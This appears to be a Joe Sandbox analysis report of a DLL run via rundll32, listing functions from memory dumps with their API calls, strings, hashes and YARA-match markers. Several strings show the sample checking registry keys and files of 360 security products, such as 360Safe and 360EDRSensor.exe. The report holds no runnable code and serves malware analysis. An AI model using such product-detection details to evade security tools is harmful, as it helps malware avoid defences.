Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: wsprintf$CloseCodeExitHandleInternetThreadnew[]$AllocateMemoryVirtual
String ID:
API String ID: 511820185-0
Opcode ID: c733c1eb138d61e5c7cccf2536b94b4266d490a8e64c5f5d78646b0364d0b340
Instruction ID: 5cb3a1d6b54fa45504f852ece0ae62cb66c488b130319d7b4e30c612378d84cb
Opcode Fuzzy Hash: c733c1eb138d61e5c7cccf2536b94b4266d490a8e64c5f5d78646b0364d0b340
Instruction Fuzzy Hash: C852D732149FD086E7B98B14E44839AF7A3F384748F104926D68D96AADDF7CD68DCB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180056664 Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 463registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

Part of subcall function 00000001800562D0: memset.MSVCRT ref: 000000018005630E
Part of subcall function 00000001800562D0: GetModuleFileNameW.KERNEL32 ref: 0000000180056325
Part of subcall function 00000001800562D0: PathAppendW.SHLWAPI ref: 0000000180056349
Part of subcall function 00000001800562D0: _wcsicmp.MSVCRT ref: 0000000180056364
Part of subcall function 00000001800562D0: PathAppendW.SHLWAPI ref: 000000018005637A

RegCloseKey.ADVAPI32 ref: 0000000180056B49

Strings

?, xrefs: 0000000180056B12
SOFTWARE\Wow6432Node\, xrefs: 000000018005678F, 000000018005695A, 0000000180056B7E
360Safe, xrefs: 00000001800566C5
360EntSecurity, xrefs: 00000001800566AF
SOFTWARE\, xrefs: 0000000180056852, 0000000180056A1B, 0000000180056BC8

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AppendPath$CloseFileHeapModuleNameProcess_wcsicmpmemset
String ID: 360EntSecurity$360Safe$?$SOFTWARE\$SOFTWARE\Wow6432Node\
API String ID: 2226481571-3054377637
Opcode ID: 559c51600a1c84c3d1a9e1e9348cf60bbaa67dd7de1927a7c1e5ea5049295e34
Instruction ID: 5d79a3dbe08d97a28ec647ffc4188a53122dfd3fad7d09cd3595c12d58dad182
Opcode Fuzzy Hash: 559c51600a1c84c3d1a9e1e9348cf60bbaa67dd7de1927a7c1e5ea5049295e34
Instruction Fuzzy Hash: 211261B2701A4886EB419B69C8413DD73A1FB85BF4F448711AA3D977E5DF78CA89C340

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004C720 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 248COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 000000018004C7EF
??_V@YAXPEAX@Z.MSVCRT ref: 000000018004C802
??3@YAXPEAX@Z.MSVCRT ref: 000000018004C815
_wtoi.MSVCRT ref: 000000018004C918

Part of subcall function 000000018004CD44: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018004CDF5

SysFreeString.OLEAUT32 ref: 000000018004C9F7

Strings

//reccfg/wndclass, xrefs: 000000018004C79A

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: FreeString$??2@??3@_wtoi
String ID: //reccfg/wndclass
API String ID: 1119205991-3779619899
Opcode ID: 9c78ad74510e5c1aaa63a647f98f978ea0f712cabf314f4090d01513adc07354
Instruction ID: aac1c87dd54dd223690f6a51cef8bcee3ce48f855a47f00273c96f55abf577db
Opcode Fuzzy Hash: 9c78ad74510e5c1aaa63a647f98f978ea0f712cabf314f4090d01513adc07354
Instruction Fuzzy Hash: D5B17A32701E489AEB81CF79C4803DC33A0F749B98F058626EA1E57B98DF38CA59C345

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180042664 Relevance: 10.7, APIs: 7, Instructions: 237networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000180042CB8: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,0000000180042715), ref: 0000000180042D94

htons.WS2_32 ref: 00000001800427AA
htonl.WS2_32 ref: 00000001800427B7
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800428C1
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180042920
memmove.MSVCRT ref: 0000000180042957

Part of subcall function 0000000180043090: MultiByteToWideChar.KERNEL32 ref: 00000001800430C2
Part of subcall function 0000000180043090: ??_V@YAXPEAX@Z.MSVCRT ref: 00000001800430E0
Part of subcall function 0000000180043090: MultiByteToWideChar.KERNEL32 ref: 0000000180043129

??_V@YAXPEAX@Z.MSVCRT ref: 00000001800429A0
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800429CB

Part of subcall function 0000000180043214: htonl.WS2_32 ref: 0000000180043230

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ByteCharMultiWide$htonl$htonsmemmove
String ID:
API String ID: 2604728826-0
Opcode ID: 47040365556197fad99d51432fd7888eae327b64f784180218b7cf6a30f5653d
Instruction ID: c6a7ef21b5906d6b557d77442a06c91d81bd98b5ee7ca8850e16d0b233cac89c
Opcode Fuzzy Hash: 47040365556197fad99d51432fd7888eae327b64f784180218b7cf6a30f5653d
Instruction Fuzzy Hash: 21B15B36704B848AE792CF61F48039EB7B5F748788F518015EE8917A98CF38D65DDB48

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180068020 Relevance: 10.7, APIs: 7, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

memmove.MSVCRT ref: 000000018006809D
??3@YAXPEAX@Z.MSVCRT ref: 0000000180068131
??3@YAXPEAX@Z.MSVCRT ref: 000000018006818D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000018001AF0F), ref: 00000001800681DE
_CxxThrowException.MSVCRT ref: 0000000180068219
?terminate@@YAXXZ.MSVCRT ref: 00000001800682C7
?terminate@@YAXXZ.MSVCRT ref: 00000001800682CD

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ??3@?terminate@@$ErrorExceptionLastThrowmemmove
String ID:
API String ID: 223594506-0
Opcode ID: abe36e33305c97acef1d384f130b573a12daa0eb5c7ec11c20e9a8599c7bd32e
Instruction ID: fcc32ee8dbcfcc96106fa9aa2d9edb036d58ed735eb2ced8cd8263455d285739
Opcode Fuzzy Hash: abe36e33305c97acef1d384f130b573a12daa0eb5c7ec11c20e9a8599c7bd32e
Instruction Fuzzy Hash: 0971E472210B8882EB559F19E8403DE6321FB8DBD4F608611FBAD47B96DF38C699C300

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000CB00 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 189COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

SHGetValueW.SHLWAPI ref: 000000018000CBF6
_time64.MSVCRT ref: 000000018000CC10

Part of subcall function 0000000180070DD0: _errno.MSVCRT ref: 0000000180070DDE

Part of subcall function 0000000180070DD0: _errno.MSVCRT ref: 0000000180070E1F

SHGetValueW.SHLWAPI ref: 000000018000CD0C

Strings

CloudCfg, xrefs: 000000018000CBBA
%s_lasttime, xrefs: 000000018000CB9B
%s_count, xrefs: 000000018000CB87

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Value_errno$HeapProcess_time64
String ID: %s_count$%s_lasttime$CloudCfg
API String ID: 2146318826-610660357
Opcode ID: 391d25aba3b16aa89747ead15b5123f6840dc9e57769fc6a8d330c04b0e76dac
Instruction ID: 0a7454a278269eadbb0ffce7cefadb2dc21e45630bc3a54506c3f9663c92b6cc
Opcode Fuzzy Hash: 391d25aba3b16aa89747ead15b5123f6840dc9e57769fc6a8d330c04b0e76dac
Instruction Fuzzy Hash: DC819572215B4986EB91DB64D4807DE77A0F7887E4F508226FA5E437E9DF38CA48CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000E478 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32 ref: 000000018000E612
GetHGlobalFromStream.OLE32 ref: 000000018000E64C
GlobalLock.KERNEL32 ref: 000000018000E65F
GlobalSize.KERNEL32 ref: 000000018000E66C

Part of subcall function 000000018000E6F8: ??3@YAXPEAX@Z.MSVCRT ref: 000000018000E74D

GlobalUnlock.KERNEL32 ref: 000000018000E6BE

Strings

__Location__, xrefs: 000000018000E59C

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Global$Stream$??3@CreateFromLockSizeUnlock
String ID: __Location__
API String ID: 3539542440-1240413640
Opcode ID: 258c331e991ad95c783ef0416d4c37d993b248583095014714736d7ddb22313c
Instruction ID: 0f7485e4f93bbca4fed8cf01455b67f1128db3508264a427a58b068d72c2ae23
Opcode Fuzzy Hash: 258c331e991ad95c783ef0416d4c37d993b248583095014714736d7ddb22313c
Instruction Fuzzy Hash: A6818072700A4885EB46DB75D8403DC3761F749BE8F548216EA2E577E5DF34CA89C300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008C68 Relevance: 10.6, APIs: 7, Instructions: 125COMMON

Download Yara Rule

APIs

CharNextW.USER32 ref: 0000000180008CA7
CharNextW.USER32 ref: 0000000180008CD3
CharNextW.USER32 ref: 0000000180008CED
CharNextW.USER32 ref: 0000000180008D05
CharNextW.USER32 ref: 0000000180008D14
CharNextW.USER32 ref: 0000000180008D81
CharNextW.USER32 ref: 0000000180008DA5

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: f29f1362136db7183f5f3bb7661024df541b93d863d4b8e8a836a3b8ce17e584
Instruction ID: 1492bbbb0fb01b81f8d7bc8417cc5d1fdb32638e21ab672acd404a2c35c9a6c4
Opcode Fuzzy Hash: f29f1362136db7183f5f3bb7661024df541b93d863d4b8e8a836a3b8ce17e584
Instruction Fuzzy Hash: 5B417236615A9881FBA2CF11D4143A833E0FB5CBD4F44C412EB8A47795EF78C7AA9305

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000C97C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000CB00: SHGetValueW.SHLWAPI ref: 000000018000CBF6
Part of subcall function 000000018000CB00: _time64.MSVCRT ref: 000000018000CC10

_time64.MSVCRT ref: 000000018000C9A2

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

SHSetValueW.SHLWAPI ref: 000000018000CA52
SHSetValueW.SHLWAPI ref: 000000018000CA73

Strings

CloudCfg, xrefs: 000000018000CA14
%s_lasttime, xrefs: 000000018000C9FF
%s_count, xrefs: 000000018000C9EC

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Value$_time64$HeapProcess
String ID: %s_count$%s_lasttime$CloudCfg
API String ID: 1319719158-610660357
Opcode ID: 633e9513b59cb82dbd4c42a8dfc42ca5507bcd6ec68c6f3b38eaf980b99686d7
Instruction ID: 831a43b99bf02356c207f364941f14581f3732c075b2ce428cfbfee20bf611f1
Opcode Fuzzy Hash: 633e9513b59cb82dbd4c42a8dfc42ca5507bcd6ec68c6f3b38eaf980b99686d7
Instruction Fuzzy Hash: 6D416CB2701B4486EB51DB29D84079D37A1FB89BF8F048325AA2E577E5DF38C688C341

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CEB670 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32 ref: 00000235B5CEB6DE
MapViewOfFile.KERNEL32 ref: 00000235B5CEB711
VirtualFree.KERNEL32 ref: 00000235B5CEB815
UnmapViewOfFile.KERNEL32 ref: 00000235B5CEB82D
CloseHandle.KERNEL32 ref: 00000235B5CEB838

Strings

@, xrefs: 00000235B5CEB6F8

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
String ID: @
API String ID: 1610889594-2766056989
Opcode ID: a436dfbeec11fa72cacc95f9423c30dfac001b64611d56dab0d816701a932b9f
Instruction ID: 5639b5f441640192cb8b6ba7e489c50c36e3e133916c71853a88fbe69688fb4b
Opcode Fuzzy Hash: a436dfbeec11fa72cacc95f9423c30dfac001b64611d56dab0d816701a932b9f
Instruction Fuzzy Hash: 1A512C32254F9581EBA4DB15E44836AE3A2F7C4B98F501421EB8E43BA9DF7CD548CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005AAEC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 000000018005AB3A
PathAppendW.SHLWAPI ref: 000000018005AB4B

Part of subcall function 000000018001A470: CreateFileW.KERNEL32 ref: 000000018001A4E8
Part of subcall function 000000018001A470: GetFileSizeEx.KERNEL32 ref: 000000018001A4FF
Part of subcall function 000000018001A470: ??_U@YAPEAX_K@Z.MSVCRT ref: 000000018001A51D
Part of subcall function 000000018001A470: ReadFile.KERNEL32 ref: 000000018001A53A
Part of subcall function 000000018001A470: CloseHandle.KERNEL32 ref: 000000018001A567

??_U@YAPEAX_K@Z.MSVCRT ref: 000000018005ABCC
memmove.MSVCRT ref: 000000018005ABDE
??_V@YAXPEAX@Z.MSVCRT ref: 000000018005ABEB

Strings

..\config\msgcenter64.dat, xrefs: 000000018005AB40

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: File$AppendCloseCreateHandleModuleNamePathReadSizememmove
String ID: ..\config\msgcenter64.dat
API String ID: 1552649294-925171115
Opcode ID: 2b6bc0a9826245997d2484599f869692e6608d281a15ca6de91b59abf58e858d
Instruction ID: 6037bf8a0cbc718679defd9cfc68d096276397db31603676c3dd85afabd3a34b
Opcode Fuzzy Hash: 2b6bc0a9826245997d2484599f869692e6608d281a15ca6de91b59abf58e858d
Instruction Fuzzy Hash: A1316032604B8886E751CF61E8447CDBBA4F389BD4F508115FEA917BA8CF38C64ACB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180056534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180056572
GetModuleFileNameW.KERNEL32 ref: 0000000180056589
PathAppendW.SHLWAPI ref: 00000001800565AD

Part of subcall function 0000000180056400: memset.MSVCRT ref: 00000001800564A0
Part of subcall function 0000000180056400: RegCloseKey.ADVAPI32 ref: 00000001800564F2

_wcsicmp.MSVCRT ref: 00000001800565C8
PathAppendW.SHLWAPI ref: 00000001800565DE
PathFileExistsW.SHLWAPI ref: 00000001800565FA

Strings

safemon\360EDRSensor.exe, xrefs: 00000001800565D2

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Path$AppendFilememset$CloseExistsModuleName_wcsicmp
String ID: safemon\360EDRSensor.exe
API String ID: 2297386589-1382049097
Opcode ID: 42f0aba2aa1986b903558ee18fe79d01fe9ddf52126576828c9ac8a665b693b0
Instruction ID: b56041483c5d1cc8e669a9f5834781a952b0b95e5cd2a6710febed08a80e77bc
Opcode Fuzzy Hash: 42f0aba2aa1986b903558ee18fe79d01fe9ddf52126576828c9ac8a665b693b0
Instruction Fuzzy Hash: 44315071724A4886EA91DB24EC9439973A0FB8C7A4F409215B96E436F5EF39C74DC700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800562D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018005630E
GetModuleFileNameW.KERNEL32 ref: 0000000180056325
PathAppendW.SHLWAPI ref: 0000000180056349

Part of subcall function 000000018005619C: memset.MSVCRT ref: 000000018005623C
Part of subcall function 000000018005619C: RegCloseKey.ADVAPI32 ref: 000000018005628E

_wcsicmp.MSVCRT ref: 0000000180056364
PathAppendW.SHLWAPI ref: 000000018005637A
PathFileExistsW.SHLWAPI ref: 0000000180056396

Strings

safemon\360ExtHost.exe, xrefs: 000000018005636E

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Path$AppendFilememset$CloseExistsModuleName_wcsicmp
String ID: safemon\360ExtHost.exe
API String ID: 2297386589-1382862812
Opcode ID: fc9508a032b388f95354c21349e4f50a604572e192d3fc7bf2bb7d329c5c28e2
Instruction ID: 6ff1a21142ab4c8bd4a0b27ef24c26924cb25d1c518f26ee789ee6da218a3a52
Opcode Fuzzy Hash: fc9508a032b388f95354c21349e4f50a604572e192d3fc7bf2bb7d329c5c28e2
Instruction Fuzzy Hash: E7316F71724A4886EBA1DB24EC943997360FB8C7A4F409215B96E836F5DF39C74CCB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000892C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000000180008966
GetProcAddress.KERNEL32 ref: 000000018000897B
RegOpenKeyExW.ADVAPI32 ref: 00000001800089CE
RegCloseKey.ADVAPI32 ref: 00000001800089E0

Strings

RegOpenKeyTransactedW, xrefs: 0000000180008971
Advapi32.dll, xrefs: 000000018000895F

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AddressCloseHandleModuleOpenProc
String ID: Advapi32.dll$RegOpenKeyTransactedW
API String ID: 823179699-3913318428
Opcode ID: e5aa230e6d6d73d44fbb0867bef8b98e7cffe5e7cefdcdffa37db2e7ba59e934
Instruction ID: bf9e62a3942db8529e652a7a00b11324bbad2056b1e05bdd0101147039c14a4a
Opcode Fuzzy Hash: e5aa230e6d6d73d44fbb0867bef8b98e7cffe5e7cefdcdffa37db2e7ba59e934
Instruction Fuzzy Hash: E7218E32604B4482EB92DF02F8543A973A0FB8CBD0F088025AED947B54DF3CC659D701

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004410C Relevance: 10.6, APIs: 7, Instructions: 58COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180044136
memset.MSVCRT ref: 0000000180044147
_time64.MSVCRT ref: 0000000180044156

Part of subcall function 000000018003BC0C: CryptAcquireContextW.ADVAPI32 ref: 000000018003BC33
Part of subcall function 000000018003BC0C: GetLastError.KERNEL32 ref: 000000018003BC3D
Part of subcall function 000000018003BC0C: CryptAcquireContextW.ADVAPI32 ref: 000000018003BC62

_time64.MSVCRT ref: 000000018004417C
srand.MSVCRT ref: 0000000180044185
rand.MSVCRT ref: 000000018004418B
LeaveCriticalSection.KERNEL32 ref: 00000001800441C5

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AcquireContextCriticalCryptSection_time64$EnterErrorLastLeavememsetrandsrand
String ID:
API String ID: 1109857607-0
Opcode ID: 8a34afe03370e941922b9fa1342c3f51188d8ab34ab1c1fde89d7cbfdbbd1467
Instruction ID: ca70be7a54b7a8b6e3e4f55ca6010b26a0c6ab118fec8c1b3c60b99ca43e49b7
Opcode Fuzzy Hash: 8a34afe03370e941922b9fa1342c3f51188d8ab34ab1c1fde89d7cbfdbbd1467
Instruction Fuzzy Hash: 7521A132B10B4482E7559F25E84439C77A5FB99F98F059225DA690BBA5CF38C68AC300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180084E36 Relevance: 10.6, APIs: 7, Instructions: 50memorysynchronizationCOMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 0000000180084E55

Part of subcall function 000000018006DB10: GetProcessHeap.KERNEL32 ref: 000000018006DB1C
Part of subcall function 000000018006DB10: HeapLock.KERNEL32 ref: 000000018006DB2D
Part of subcall function 000000018006DB10: HeapWalk.KERNEL32 ref: 000000018006DB40
Part of subcall function 000000018006DB10: HeapFree.KERNEL32 ref: 000000018006DB88
Part of subcall function 000000018006DB10: HeapUnlock.KERNEL32 ref: 000000018006DB91

ReleaseMutex.KERNEL32 ref: 0000000180084E73
TlsFree.KERNEL32 ref: 0000000180084E8D
CloseHandle.KERNEL32 ref: 0000000180084E9B
GetProcessHeap.KERNEL32 ref: 0000000180084EAA
HeapFree.KERNEL32 ref: 0000000180084EBD
CloseHandle.KERNEL32 ref: 0000000180084ECD

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

